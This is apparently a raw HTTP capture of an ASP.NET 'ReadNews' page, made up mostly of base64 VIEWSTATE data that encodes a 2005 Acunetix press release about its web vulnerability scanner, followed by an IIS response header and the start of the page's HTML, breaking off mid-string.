CAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30581
Response Body - size: 30,581 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmF